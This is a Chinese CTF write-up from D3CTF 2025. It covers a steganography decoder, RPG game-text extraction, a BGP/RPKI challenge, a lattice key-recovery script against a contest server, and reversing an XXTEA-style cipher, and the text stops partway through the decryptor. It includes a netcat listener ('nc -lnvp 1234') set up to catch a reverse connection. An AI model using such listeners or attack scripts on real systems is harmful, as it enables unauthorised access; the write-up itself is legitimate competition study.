2025 D3CTF SU WriteUp

本次D3CTF我们 SU(“为啥桂电不算电”) 取得了第六名的成绩,感谢队里师傅们的辛苦付出!同时我们也在持续招人,欢迎发送个人简介至:suers_xctf@126.com 或者直接联系书鱼 QQ:381382770。

以下是我们 SU 本次 2025 D3CTF的 writeup。


本次D3CTF我们 SU(“为啥桂电不算电”) 取得了第六名的成绩

感谢队里师傅们的辛苦付出!同时我们也在持续招人,欢迎发送个人简介至:suers_xctf@126.com 或者直接联系书鱼 QQ:381382770。
以下是我们 SU 本次 2025 D3CTF的 writeup。

Misc

d3image

从图像 mysterious_invitation.png 中解密隐藏信息,首先分析提供的 block.pyd3net.pymodel.pyutils.py

关键在于识别出核心的 D3net 模型是由多个可逆的 INV_block(仿射耦合层)构成,表明整体具备可逆性。研究 test.py 中的编码流程,了解到编码器对封面图像和秘密文本分别进行DWT(离散小波变换),拼接后送入 d3netd3net 输出的前半部分(DWT域)经IWT(逆小波变换)后形成隐写图像,而后半部分(包含变换后的秘密信息)则在编码时被丢弃。

解密的核心挑战在于如何处理这丢失的后半部分信息以执行 d3net 的逆运算。假设这部分可由 utils.py 中提供的 auxiliary_variable 生成的随机噪声替代。因此,解密流程被设计为:为 INV_blockD3net 实现 inverse 方法;加载隐写图像并进行DWT得到前半部分已知输入;生成辅助噪声作为后半部分输入;将两者拼接后送入 d3net 的逆模型;从逆运算结果中分离出重建的负载DWT,再通过IWT、二值化及文本转换工具(包括Reed-Solomon解码和zlib解压)恢复出明文。

主要障碍是 magic.potions 权重文件中的参数名称与解密脚本中重构模型(使用 nn.ModuleList 管理 INV_block)的参数名称不匹配,通过在加载权重时进行精确的密钥名转换解决该问题,最终提取出隐藏的flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as T
from PIL import Image
from collections import Counter
import numpy as np
import math # Used by IWT/DWT logic indirectly via divisions, and potentially PSNR if it were here.
import zlib
from reedsolo import RSCodec
import re # For robust key matching

# --- Model Definitions (Copied and modified from original files) ---
class ResidualDenseBlock_out(nn.Module):
def __init__(self, bias=True):
super(ResidualDenseBlock_out, self).__init__()
self.channel = 12
self.hidden_size = 32
self.conv1 = nn.Conv2d(self.channel, self.hidden_size, 3, 1, 1, bias=bias)
self.conv2 = nn.Conv2d(self.channel + self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias)
self.conv3 = nn.Conv2d(self.channel + 2 * self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias)
self.conv4 = nn.Conv2d(self.channel + 3 * self.hidden_size, self.hidden_size, 3, 1, 1, bias=bias)
self.conv5 = nn.Conv2d(self.channel + 4 * self.hidden_size, self.channel, 3, 1, 1, bias=bias)
self.lrelu = nn.LeakyReLU(negative_slope=0.2, inplace=True)
# initialize_weights call removed as weights are loaded externally for inference.

def forward(self, x):
x1 = self.lrelu(self.conv1(x))
x2 = self.lrelu(self.conv2(torch.cat((x, x1), 1)))
x3 = self.lrelu(self.conv3(torch.cat((x, x1, x2), 1)))
x4 = self.lrelu(self.conv4(torch.cat((x, x1, x2, x3), 1)))
x5 = self.conv5(torch.cat((x, x1, x2, x3, x4), 1))
return x5

class INV_block(nn.Module):
def __init__(self, clamp=2.0):
super().__init__()
self.split_len1 = 12
self.split_len2 = 12
self.clamp = clamp
self.r = ResidualDenseBlock_out()
self.y = ResidualDenseBlock_out()
self.f = ResidualDenseBlock_out()

def e(self, s):
return torch.exp(self.clamp * 2 * (torch.sigmoid(s) - 0.5))

def forward(self, x, rev=False):
if rev:
return self.inverse(x)
return self.direct_forward(x)

def direct_forward(self, x):
x1, x2 = (x.narrow(1, 0, self.split_len1),
x.narrow(1, self.split_len1, self.split_len2))
t2 = self.f(x2)
y1 = x1.clone() + t2
s1, t1 = self.r(y1), self.y(y1)
y2 = self.e(s1) * x2 + t1
return torch.cat((y1, y2), 1)

def inverse(self, y_cat):
y1, y2 = (y_cat.narrow(1, 0, self.split_len1),
y_cat.narrow(1, self.split_len1, self.split_len2))
s1, t1 = self.r(y1), self.y(y1)
x2 = (y2 - t1) / self.e(s1)
t2 = self.f(x2)
x1 = y1.clone() - t2
return torch.cat((x1, x2), 1)


class D3net(nn.Module):
def __init__(self):
super(D3net, self).__init__()
self.inv_blocks = nn.ModuleList()
for _ in range(8): # Original D3net has 8 INV_blocks
self.inv_blocks.append(INV_block())

def forward(self, x, rev=False):
if rev:
return self.inverse(x)
return self.direct_forward(x)

def direct_forward(self, x):
out = x
for block in self.inv_blocks:
out = block.direct_forward(out)
return out

def inverse(self, x):
out = x
for block in reversed(self.inv_blocks): # Apply inverse of blocks in reverse order
out = block.inverse(out)
return out

class Model(nn.Module):
def __init__(self, use_cuda=True): # Parameter name changed for clarity
super(Model, self).__init__()
self.model = D3net()
if use_cuda and torch.cuda.is_available():
self.model.cuda()

def forward(self, x, rev=False):
return self.model(x, rev=rev)

# --- Utility Classes and Functions (Copied/adapted from utils.py) ---
rs = RSCodec(128)

class DWT(nn.Module):
def __init__(self):
super(DWT, self).__init__()
self.requires_grad = False # Fixed transform

def forward(self, x):
x01 = x[:, :, 0::2, :] / 2
x02 = x[:, :, 1::2, :] / 2
x1 = x01[:, :, :, 0::2]
x2 = x02[:, :, :, 0::2]
x3 = x01[:, :, :, 1::2]
x4 = x02[:, :, :, 1::2]
x_LL = x1 + x2 + x3 + x4
x_HL = -x1 - x2 + x3 + x4
x_LH = -x1 + x2 - x3 + x4
x_HH = x1 - x2 - x3 + x4
return torch.cat((x_LL, x_HL, x_LH, x_HH), 1)

class IWT(nn.Module):
def __init__(self):
super(IWT, self).__init__()
self.requires_grad = False # Fixed transform

def forward(self, x):
r = 2
in_batch, in_channel, in_height, in_width = x.size()
out_batch, out_channel, out_height, out_width = in_batch, int(
in_channel / (r ** 2)), r * in_height, r * in_width
x1 = x[:, 0:out_channel, :, :] / 2
x2 = x[:, out_channel:out_channel * 2, :, :] / 2
x3 = x[:, out_channel * 2:out_channel * 3, :, :] / 2
x4 = x[:, out_channel * 3:out_channel * 4, :, :] / 2
h = torch.zeros([out_batch, out_channel, out_height, out_width], device=x.device).float()
h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4
h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4
h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4
h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4
return h

def auxiliary_variable(shape, device):
return torch.randn(shape, device=device)

def bits_to_bytearray(bits):
ints = []
bits_list = np.array(bits).astype(int).tolist() # Ensure list of ints
for b in range(len(bits_list) // 8):
byte_bits = bits_list[b * 8:(b + 1) * 8]
ints.append(int(''.join([str(bit) for bit in byte_bits]), 2))
return bytearray(ints)

def bytearray_to_text(x_bytearray):
try:
decoded_data_tuple = rs.decode(x_bytearray)
data_to_decompress = None
if isinstance(decoded_data_tuple, tuple) or isinstance(decoded_data_tuple, list):
if decoded_data_tuple:
if isinstance(decoded_data_tuple[0], list) and len(decoded_data_tuple[0]) > 0:
data_to_decompress = decoded_data_tuple[0][0]
else:
data_to_decompress = decoded_data_tuple[0]
else:
data_to_decompress = decoded_data_tuple

if data_to_decompress is None:
return False # Reed-Solomon decoding might result in no data

decompressed_text_bytes = zlib.decompress(data_to_decompress)
return decompressed_text_bytes.decode("utf-8")
except Exception: # Catch all errors during RS decoding or zlib decompression
return False

# --- Script Helper Functions ---
transform_stego = T.Compose([
T.CenterCrop((720, 1280)), # Assumes stego image is at least this size or exactly this size
T.ToTensor(),
])

def load_model_weights(model_wrapper_instance, weight_file_path):
print(f"Attempting to load weights from: {weight_file_path}")
try:
# Explicitly set weights_only=False for compatibility if file has pickled classes,
# though True is safer if it's guaranteed to be only tensors.
full_state_dict_from_file = torch.load(weight_file_path, map_location=lambda storage, loc: storage,
weights_only=False)

# Extract the relevant state dictionary (likely under 'net' key from original Model save)
if 'net' in full_state_dict_from_file:
params_from_file = full_state_dict_from_file['net']
else:
params_from_file = full_state_dict_from_file # Fallback if no 'net' key

transformed_state_dict = {}
for k_orig, v_param in params_from_file.items():
if 'tmp_var' in k_orig: # Skip temporary variables if any
continue

new_k = k_orig # Default to original key

# Transform keys from "model.invX..." to "inv_blocks.(X-1)..."
if k_orig.startswith("model."):
key_after_model_prefix = k_orig[len("model."):]
match = re.match(r"inv(\d+)\.(.*)", key_after_model_prefix)
if match:
inv_idx = int(match.group(1)) - 1
rest_of_key = match.group(2)
new_k = f"inv_blocks.{inv_idx}.{rest_of_key}"
# Transform keys from "invX..." (if no "model." prefix was present)
elif k_orig.startswith("inv"):
match = re.match(r"inv(\d+)\.(.*)", k_orig)
if match:
inv_idx = int(match.group(1)) - 1
rest_of_key = match.group(2)
new_k = f"inv_blocks.{inv_idx}.{rest_of_key}"
# If transformation occurred, new_k will be different. Otherwise, it's k_orig.
# Print a warning if a key was expected to be transformed but wasn't,
# or if an unexpected key structure is encountered.
if new_k == k_orig and (k_orig.startswith("model.inv") or k_orig.startswith("inv")):
print(f"Warning: Key '{k_orig}' was not transformed as expected. Check patterns.")

transformed_state_dict[new_k] = v_param

# Load into the D3net instance (model_wrapper_instance.model)
model_wrapper_instance.model.load_state_dict(transformed_state_dict)
print(f"Weights loaded successfully into D3net model.")
except FileNotFoundError:
print(f"Error: Weight file '{weight_file_path}' not found.")
raise
except Exception as e:
print(f"Error loading or processing weights from '{weight_file_path}': {e}")
raise


def stego_transform2tensor(img_path, current_device):
img = Image.open(img_path).convert('RGB')
transformed_img = transform_stego(img)
return transformed_img.unsqueeze(0).to(current_device)


# --- Main Decryption Logic ---
def decrypt_message(stego_image_path, weight_file):
print("Initializing...")
current_device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(f"Using device: {current_device}")

# Initialize the Model which wraps D3net
d3net_wrapper = Model(use_cuda=torch.cuda.is_available())

dwt = DWT().to(current_device)
iwt = IWT().to(current_device)

load_model_weights(d3net_wrapper, weight_file)
d3net_wrapper.eval() # Set to evaluation mode

print(f"Loading steganographic image: {stego_image_path}")
stego_tensor = stego_transform2tensor(stego_image_path, current_device)

B, C_stego, H_stego, W_stego = stego_tensor.size()

print("Applying DWT to stego image...")
Y1_observed_dwt = dwt(stego_tensor)

print("Generating auxiliary variable...")
Y2_for_inverse_dwt_shape = Y1_observed_dwt.shape
Y2_for_inverse_dwt = auxiliary_variable(Y2_for_inverse_dwt_shape, current_device)

Y_input_for_inverse = torch.cat((Y1_observed_dwt, Y2_for_inverse_dwt), dim=1)

print("Applying inverse D3Net model...")
with torch.no_grad(): # Inference mode
X_reconstructed_dwt = d3net_wrapper(Y_input_for_inverse, rev=True)

# Extract the payload part from the reconstructed DWT tensor
num_channels_per_dwt_stream = Y1_observed_dwt.shape[1] # Should be 12 for a 3-channel original image
reconstructed_payload_dwt = X_reconstructed_dwt.narrow(1, num_channels_per_dwt_stream, num_channels_per_dwt_stream)

print("Applying IWT to reconstructed payload DWT...")
recovered_payload_spatial = iwt(reconstructed_payload_dwt)

print("Binarizing recovered payload...")
recovered_bits_flat = (recovered_payload_spatial.contiguous().view(-1) > 0.5).float()

print("Converting bits to text...")
candidates = Counter()
bits_list = recovered_bits_flat.data.int().cpu().numpy().tolist()

terminator = b'\x00' * (32 // 8) # 4 null bytes, matching 32 zero bits in make_payload
byte_array_data = bits_to_bytearray(bits_list)

potential_message_parts = []
current_part_start_index = 0
search_from_index = 0
while search_from_index < len(byte_array_data):
terminator_found_at = -1
try: # bytearray.find is efficient
terminator_found_at = byte_array_data.find(terminator, search_from_index)
except TypeError: # Fallback for some Python versions if .find with bytes fails
idx = search_from_index
while idx <= len(byte_array_data) - len(terminator):
if byte_array_data[idx: idx + len(terminator)] == terminator:
terminator_found_at = idx
break
idx += 1

if terminator_found_at != -1:
part = byte_array_data[current_part_start_index: terminator_found_at]
if part: potential_message_parts.append(part)
current_part_start_index = terminator_found_at + len(terminator)
search_from_index = current_part_start_index
else: # No more terminators
part = byte_array_data[current_part_start_index:]
if part: potential_message_parts.append(part)
break

if not potential_message_parts and len(byte_array_data) > 0: # Handle case with no terminators but data exists
potential_message_parts.append(byte_array_data)

for candidate_bytes in potential_message_parts:
if not candidate_bytes: continue # Skip empty byte arrays
candidate_text = bytearray_to_text(candidate_bytes)
if candidate_text: # bytearray_to_text returns False on error
candidates[candidate_text] += 1

if not candidates:
print("\nFailed to find any candidate message after decoding.")
return None

most_common_candidate, count = candidates.most_common(1)[0]
print(f"\n--- Recovered Message (most common, appeared {count} times) ---")
print(most_common_candidate)
print("--- End of Message ---")
return most_common_candidate


if __name__ == '__main__':
stego_image_file = 'mysterious_invitation.png'
model_weights_file = 'magic.potions'

import os

if not os.path.exists(stego_image_file):
print(f"Error: Stego image '{stego_image_file}' not found. Please place it in the current directory.")
elif not os.path.exists(model_weights_file):
print(f"Error: Model weights file '{model_weights_file}' not found. Please place it in the current directory.")
else:
decrypt_message(stego_image_file, model_weights_file)

img

d3rpg-signin

通过任务管理器可得其为RPG Maker系列游戏

img

常玩这一类的玩家可以知道可以使用mtool进行游戏内容的获取和修改

img

通过游玩发现flag以文本的形式出现

img

img

因而可以使用mtool的翻译功能获取所有的文本

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
{
前序省略
"*The Musc meme comes from a person": "*The Musc meme comes from a person",
"*but boring. People combined his": "*but boring. People combined his",
"Thank you for your hard work,": "Thank you for your hard work,",
"You firmly remember the flag he": "You firmly remember the flag he",
"I won't give you any clues,": "I won't give you any clues,",
"System": "System",
"Flag Correct! The world": "Flag Correct! The world",
"Malicious code": "Malicious code",
"Please hurry up, the malicious": "Please hurry up, the malicious",
"你拨开灰烬,发现一块烧焦的木片,上": "你拨开灰烬,发现一块烧焦的木片,上",
"You push aside the ashes and find": "You push aside the ashes and find",
"\"LOG": "\"LOG",
"Core temperature": "Core temperature",
"请选择语言": "请选择语言",
"Select Language": "Select Language",
"简体中文": "简体中文",
"English": "English",
"TIP": "TIP",
"The English version is": "The English version is",
"欢迎来到D3RPG,一个游戏世界名为": "欢迎来到D3RPG,一个游戏世界名为",
"传说中,创世神「D3」的源代码被": "传说中,创世神「D3」的源代码被",
"玩家扮演一名闯入这个世界的黑": "玩家扮演一名闯入这个世界的黑",
"Welcome to D3RPG, a game world": "Welcome to D3RPG, a game world",
"According to legend, the source code": "According to legend, the source code",
"The player plays a hacker who breaks": "The player plays a hacker who breaks",
"宝箱:我只是一个贴图!!!": "宝箱:我只是一个贴图!!!",
"Treasure Chest": "Treasure Chest",
"5a303760342c3733313234262121256421": "5a303760342c3733313234262121256421",
"I'm just a sticker!!!": "I'm just a sticker!!!",
"宝箱中的纸条:": "宝箱中的纸条:",
"Note in the treasure chest": "Note in the treasure chest",
"宝箱中的纸条:密码 ≠ 密钥,": "宝箱中的纸条:密码 ≠ 密钥,",
"村长": "村长",
"你好,我是村长": "你好,我是村长",
"太好了是村长我们有救了": "太好了是村长我们有救了",
"我知道你很想现在就拿到flag,但是": "我知道你很想现在就拿到flag,但是",
"Hint:": "Hint:",
"Village Chief": "Village Chief",
"Hello, I am the": "Hello, I am the",
"Good!": "Good!",
"I know you want to get the flag": "I know you want to get the flag",
"宝箱:瞅我干啥,我还能给你变出": "宝箱:瞅我干啥,我还能给你变出",
"Why are you": "Why are you",
"The note in the treasure chest": "The note in the treasure chest",
"村长不愧是老北京,就是地道啊。": "村长不愧是老北京,就是地道啊。",
"The village chief is indeed an old": "The village chief is indeed an old",
"he is authentic.": "he is authentic.",
"loopholes. It turns out that this": "loopholes. It turns out that this",
"can be reached on the map.": "can be reached on the map.",
"the tavern is under the village": "the tavern is under the village",
"’s house!!": "’s house!!",
"here.": "here.",
"can really earn money to 0x7f": "can really earn money to 0x7f",
"that's the case,": "that's the case,",
"'ll give you a reward!": "'ll give you a reward!",
"VzNsYzBtM183b19kM19ScEdfVzByMWQ=": "VzNsYzBtM183b19kM19ScEdfVzByMWQ=",
后续省略
}

在其中发现一串完整的base密文串,我们所获取的flag1也在其中,从而推断出其为flag,解密得到flag

img

d3RPKI

修改配置文件

img

img

1
2
3
4
5
6
7
8
9
10
11
12
13
root@c839a5a0ff21:~# birdc configure
BIRD 2.14 ready.
Reading configuration from /etc/bird/bird.conf
Reconfigured
root@c839a5a0ff21:~# birdc show protocols
BIRD 2.14 ready.
Name Proto Table State Since Info
device1 Device --- up 14:54:57.361
kernel1 Kernel master4 up 14:54:57.361
static1 Static BGP_table up 14:54:57.361
rpki1 RPKI --- up 14:54:57.364 Established
pipe1 Pipe --- up 14:54:57.361 master4 <=> BGP_table
t1 BGP --- up 14:55:01.836 Established

nc 等待回连即可

1
root@c839a5a0ff21:~# nc -lnvp 1234

Crypto

d3fnv

  • 通过服务器选项收集多个(如65个)已知哈希输出 C
  • 运用三阶段的LLL(及BKZ)格密码攻击:
    • 第一阶段 : 基于收集的哈希矩阵 C 和素数 p 构造初始格,通过LLL找到与 C 相关的初步线性关系。
    • 第二阶段 : 利用第一阶段的结果,并引入缩放因子,进一步通过LLL提炼信息。
    • 第三阶段 (BKZ与构造格K): 对第二阶段的结果进行BKZ增强规约,得到关键基 。然后构造包含 tar C 的格 K****,通过LLL从中分离出“非线性/误差”部分 X****。

密钥恢复:

  • 得到 XB_ 后,在 GF(p) 域上求解线性方程 A_ * B_ ≡ C - X (mod p),得到系数列表 。
  • 根据题目特性,在列表中寻找满足特定代数条件的系数 k 即为恢复的密钥(作为 GF(p) 元素)。

完成挑战:

  • 使用恢复的密钥(转换为整数形式或直接以 GF(p) 形式,取决于FNV实现细节)和已知的 p (整数形式),计算服务器最终给出的挑战token的FNV哈希。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
from pwn import remote, context
from sage.all import matrix, GF, ZZ, identity_matrix, zero_matrix, block_matrix, Matrix

context.log_level = 'CRITICAL'

class FNVEquivalentHash:
def __init__(self, p_modulus_py_int, key_as_gf_element):
self.p_val = p_modulus_py_int
self.key_val = key_as_gf_element

def H4sh(self, value_str: str):
length = len(value_str)
current_x_py_int = 0

if not value_str:
if length == 0:
return 0 ^ length
current_x_py_int = (0 << 7) % self.p_val
else:
current_x_py_int = (ord(value_str[0]) << 7) % self.p_val

for char_c in value_str:
term_in_gf = self.key_val * current_x_py_int
term_as_py_int = int(term_in_gf)
current_x_py_int = term_as_py_int ^ ord(char_c)

current_x_py_int ^= length
return current_x_py_int

def mirrored_attack_logic(param_n, param_m, param_r, modulus_N_py_int, C_matrix_1xm):
C_matrix_mx1 = C_matrix_1xm.transpose()

Lattice_M_stage1 = block_matrix(ZZ, [
[modulus_N_py_int * identity_matrix(ZZ, param_r), zero_matrix(ZZ, param_r, param_m)],
[C_matrix_mx1, identity_matrix(ZZ, param_m)]
])

temp_lll_output = Lattice_M_stage1.LLL()
print("... attack_logic: LLL on M_stage1 -> done")

M_matrix_reassigned = Matrix(ZZ, [temp_lll_output[i][param_r:] for i in range(param_n + 1)])

Lattice_TempM_stage2 = block_matrix(ZZ, [
[(2**40) * M_matrix_reassigned.transpose(), identity_matrix(ZZ, param_m)]
])
res_lll_output = Lattice_TempM_stage2.LLL()
print("... attack_logic: LLL on TempM_stage2 -> done")

res1_matrix_for_bkz = Matrix(ZZ, [res_lll_output[i][param_n + 1:] for i in range(param_n)])
res1_matrix_after_bkz = res1_matrix_for_bkz.BKZ(block_size=20)

tar_basis_matrix = matrix(ZZ, [res1_matrix_after_bkz[i] for i in range(param_n)])

Lattice_K_stage3 = block_matrix(ZZ, [
[tar_basis_matrix, zero_matrix(ZZ, tar_basis_matrix.nrows(), 1)],
[C_matrix_1xm, matrix(ZZ, [[1]])],
[modulus_N_py_int * identity_matrix(ZZ, param_m), zero_matrix(ZZ, param_m, 1)]
])

ans_lll_final_output = Lattice_K_stage3.LLL()
print("... attack_logic: LLL on K_stage3 -> done")

for vector_i_candidate in ans_lll_final_output[param_n : param_n + param_n + 2]:
i_list = vector_i_candidate.list()
if abs(i_list[-1]) == 1:
X_solution_flat_list = (vector_i_candidate * i_list[-1]).list()[:-1]
X_solution_matrix_1xm = matrix(ZZ, [X_solution_flat_list])
return X_solution_matrix_1xm, tar_basis_matrix

print("[WARNING] attack_logic: Solution X not found in final LLL.")
return None, None

def main_solver_process():
target_connection = None
try:
target_connection = remote('35.241.98.126', 30924)
target_connection.recvuntil(b'option >')
target_connection.sendline(b'G')

p_val_py_int = int(target_connection.recvline()[4:].decode().strip())
print(f">>> Received p (Python int): {str(p_val_py_int)[:20]}...")

C_hashes_py_list = []
print(">>> Collecting C hashes...")
for _ in range(65):
target_connection.recvuntil(b'option >')
target_connection.sendline(b'H')
C_hashes_py_list.append(int(target_connection.recvline()[12:].decode().strip()))
print(f" Collected {len(C_hashes_py_list)} hashes.")

C_sage_matrix_1xm = matrix(ZZ, [C_hashes_py_list])

n_param, m_param, r_param = 32, 65, 1

print(">>> Initiating mirrored attack logic...")
X_result_matrix, B_prime_basis_matrix = mirrored_attack_logic(
n_param, m_param, r_param, p_val_py_int, C_sage_matrix_1xm
)

if X_result_matrix is None:
print("[STOP] Attack logic failed to produce X vector.")
return

print(">>> Attack logic successful. Deriving A_coeffs...")
current_field_GF_p = GF(p_val_py_int)
C_minus_X_matrix = C_sage_matrix_1xm - X_result_matrix
target_for_solve_gf = matrix(current_field_GF_p, C_minus_X_matrix)
A_coeffs_sage_matrix = B_prime_basis_matrix.solve_left(target_for_solve_gf)

Al_outer_list = A_coeffs_sage_matrix.list()

actual_Al_coeffs_gf_list = []
if Al_outer_list and isinstance(Al_outer_list[0], list):
actual_Al_coeffs_gf_list = Al_outer_list[0]
elif Al_outer_list:
actual_Al_coeffs_gf_list = Al_outer_list

if not actual_Al_coeffs_gf_list:
print("[STOP] Coefficient list Al is empty.")
return
print(f" Coefficient list Al (GF(p) elements) obtained, length: {len(actual_Al_coeffs_gf_list)}.")

target_connection.recvuntil(b'option >')
target_connection.sendline(b'F')

recovered_key_as_gf_element = None
for current_coeff_gf in actual_Al_coeffs_gf_list:
term_pow_29 = current_coeff_gf ** 29
neg_term_pow_29 = -term_pow_29
if term_pow_29 in actual_Al_coeffs_gf_list or neg_term_pow_29 in actual_Al_coeffs_gf_list:
recovered_key_as_gf_element = current_coeff_gf
break

if recovered_key_as_gf_element is None:
print("[STOP] Key recovery condition not met from Al list.")
return

print(f">>> Candidate key (GF(p) element) recovered: {recovered_key_as_gf_element}")

target_connection.recvuntil(b'Here is a random token x: ')
challenge_token = target_connection.recvline()[:-1].decode()
print(f">>> Server token for hashing: {challenge_token}")

fnv_instance = FNVEquivalentHash(p_val_py_int, recovered_key_as_gf_element)
computed_hash_py_int = fnv_instance.H4sh(challenge_token)
print(f">>> Computed hash (Python int): {computed_hash_py_int}")

target_connection.recvuntil(b'Could you tell the value of H4sh(x)? ')
target_connection.sendline(str(computed_hash_py_int).encode())

server_response_1 = target_connection.recvline().decode().strip()
print(f"<<< Server response line 1: {server_response_1}")
try:
server_response_2 = target_connection.recvline().decode().strip()
if server_response_2:
print(f"<<< Server response line 2: {server_response_2}")
except EOFError:
print(" (Server connection closed after one response line)")

except Exception as e_main:
print(f"[FATAL] Main process caught exception: {type(e_main).__name__} - {e_main}")
finally:
if target_connection:
target_connection.close()
print("--- Main process finished ---")

if __name__ == "__main__":
main_solver_process()

运行了几次某一次成功了

Re

d3rpg-revenge

010打开secret_dll.dll发现upx壳

img

利用fupx脱壳

img

利用ida发现check_flag函数和密文

img

尝试运行,利用ce获取内存dump寻找check_flag调用

img

得到ruby加密代码和密钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
module Scene_RPG
class Secret_Class
DELTA = 0x1919810 | (($de1ta + 1) * 0xf0000000)
def initialize(new_key)
@key = str_to_longs(new_key)
if @key.length < 4
@key.length.upto(4) { |i| @key[i] = 0 }
end
end
def self.str_to_longs(s, include_count = false)
s = s.dup
length = s.length
((4 - s.length % 4) & 3).times { s << "\0" }
unpacked = s.unpack('V*').collect { |n| int32 n }
unpacked << length if include_count
unpacked
end
def str_to_longs(s, include_count = false)
self.class.str_to_longs s, include_count
end
def self.longs_to_str(l, count_included = false)
s = l.pack('V*')
s = s[0...(l[-1])] if count_included
s
end
def longs_to_str(l, count_included = false)
self.class.longs_to_str l, count_included
end
def self.int32(n)
n -= 4_294_967_296 while (n >= 2_147_483_648)
n += 4_294_967_296 while (n <= -2_147_483_648)
n.to_i
end
def int32(n)
self.class.int32 n
end

def mx(z, y, sum, p, e)
int32(
((z >> 5 & 0x07FFFFFF) ^ (y << 2)) +
((y >> 3 & 0x1FFFFFFF) ^ (z << 4))
) ^ int32((sum ^ y) + (@key[(p & 3) ^ e] ^ z))
end
def self.encrypt(key, plaintext)
self.new(key).encrypt(plaintext)
end
def encrypt(plaintext)
return '' if plaintext.length == 0
v = str_to_longs(plaintext, true)
v[1] = 0 if v.length == 1
n = v.length - 1
z = v[n]
y = v[0]
q = (6 + 52 / (n + 1)).floor
sum = $de1ta * DELTA
p = 0
while(0 <= (q -= 1)) do
sum = int32(sum + DELTA)
e = sum >> 2 & 3
n.times do |i|
y = v[i + 1];
z = v[i] = int32(v[i] + mx(z, y, sum, i, e))
p = i
end
p += 1
y = v[0];
z = v[p] = int32(v[p] + mx(z, y, sum, p, e))
end
longs_to_str(v).unpack('a*').pack('m').delete("\n")
end
def self.decrypt(key, ciphertext)
self.new(key).decrypt(ciphertext)
end
end
end

def validate_flag(input_flag)
c_flag = input_flag + "\0"
result = $check_flag.call(c_flag)
result == 1
end


def check
flag = $game_party.actors[0].name
key = Scene_RPG::Secret_Class.new('rpgmakerxp_D3CTF')
cyphertext = key.encrypt(flag)
if validate_flag(cyphertext)
$game_variables[1] = 100
else
$game_variables[1] = 0
end
end

根据加密代码写出解密代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import base64
import struct

class SecretDecryptor:
DELTA = 0xF1919810

def __init__(self, key):
self.key = self.str_to_longs(key)
if len(self.key) < 4:
self.key += [0] * (4 - len(self.key))

@staticmethod
def str_to_longs(s, include_count=False):
s = s.encode('utf-8')
length = len(s)
padding = (4 - length % 4) % 4
s += b'\0' * padding
unpacked = list(struct.unpack('<%dI' % (len(s) // 4), s))
if include_count:
unpacked.append(length)
return unpacked

@staticmethod
def longs_to_str(l, count_included=False):
length = l[-1] if count_included else len(l) * 4
s = struct.pack('<%dI' % len(l), *l)
return s[:length].decode('utf-8')

@staticmethod
def int32(n):
n = n & 0xFFFFFFFF
return n if n < 0x80000000 else n - 0x100000000

def mx(self, z, y, sum_, p, e):
return self.int32(
((z >> 5 & 0x07FFFFFF) ^ (y << 2)) +
((y >> 3 & 0x1FFFFFFF) ^ (z << 4))
) ^ self.int32((sum_ ^ y) + (self.key[(p & 3) ^ e] ^ z))

def decrypt(self, ciphertext):
decoded = base64.b64decode(ciphertext)
v = list(struct.unpack('<%dI' % (len(decoded) // 4), decoded))
n = len(v) - 1
q = (6 + 52 // (n + 1))
sum_ = q * self.DELTA
y = v[0]

while sum_ != 0:
e = (sum_ >> 2) & 3
for p in range(n, 0, -1):
z = v[p-1]
